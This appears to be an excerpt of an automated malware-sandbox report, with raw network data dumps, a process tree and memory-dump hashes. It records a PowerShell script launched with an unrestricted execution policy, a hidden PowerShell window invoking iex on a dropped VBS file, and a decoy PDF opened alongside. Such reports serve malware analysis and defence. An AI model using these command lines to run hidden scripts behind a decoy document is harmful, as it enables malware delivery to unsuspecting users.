                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                        Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                        Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                        Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                        Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                        Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                        Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                        Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                        Target ID:0
                                                                                        Start time:06:47:47
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1"
                                                                                        Imagebase:0x7ff6e3d50000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:06:47:47
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:06:47:50
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
                                                                                        Imagebase:0x7ff6e3d50000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:06:48:00
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                        Imagebase:0x7ff651090000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:06:48:02
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff70df30000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:06:48:02
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7403e0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:8
                                                                                        Start time:06:48:02
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff70df30000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2427179770.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A_H
                                                                                          • API String ID: 0-522415800
                                                                                          • Opcode ID: ee37bde4aca7319df0846c399230076561aeec93b7ab22d4b1295300fc2dbfcd
                                                                                          • Instruction ID: f46a2ddadef17c66d64f6b20b5b1e685df899800a57edae70e2d9c116f47fb4e
                                                                                          • Opcode Fuzzy Hash: ee37bde4aca7319df0846c399230076561aeec93b7ab22d4b1295300fc2dbfcd
                                                                                          • Instruction Fuzzy Hash: 7D11E371F0D6894FEB95DA5854A45A87B91EF56334F0400BEC94CC7193DA2DA804C721
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2427179770.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87582d2d4497c7ad4cd7b393a42df3ccfcb9083ec09fc7360b3b07182520d14e
                                                                                          • Instruction ID: 9c67e1364092d4ca5566c67037c0d3996c03c29270dc973eb44c06ea996e5660
                                                                                          • Opcode Fuzzy Hash: 87582d2d4497c7ad4cd7b393a42df3ccfcb9083ec09fc7360b3b07182520d14e
                                                                                          • Instruction Fuzzy Hash: D2B14622B0DB890FE75AA72858A55B53BE1EF57230F0801EFD589CB1D7D91CA805D362
                                                                                          Memory Dump Source